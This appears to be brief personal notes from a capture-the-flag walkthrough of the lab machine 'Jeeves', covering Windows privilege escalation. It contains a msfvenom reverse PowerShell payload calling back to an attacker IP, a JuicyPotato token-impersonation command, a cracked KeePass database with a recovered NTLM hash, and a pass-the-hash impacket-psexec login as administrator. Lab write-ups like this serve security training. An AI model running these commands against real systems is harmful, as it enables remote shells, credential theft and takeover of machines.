Jeeves
Last updated
Last updated
whoami /priv
# Check for :-
Privilege Name Description State
============================= ========================================= ========
SeImpersonatePrivilege Impersonate a client after authentication Enabled #1 Create rev-shell and tranfer to victim
msfvenom -p cmd/windows/reverse_powershell lhost=10.10.14.4 lport=443 > shell.bat
#2 run below command and catch shell
./JuicyPotato.exe -l 4444 -t * -p 'shell.bat'C:\Users\kohsuke\documents\CEX.kdbxkpcli --kdb CEH.kdbx -key moonshine1kpcli:/> show -f 0
Path: /CEH/
Title: Backup stuff
Uname: ?
Pass: aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
URL:
Notes:
---[snip]---impacket-psexec administrator@10.10.10.63 -hashes aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00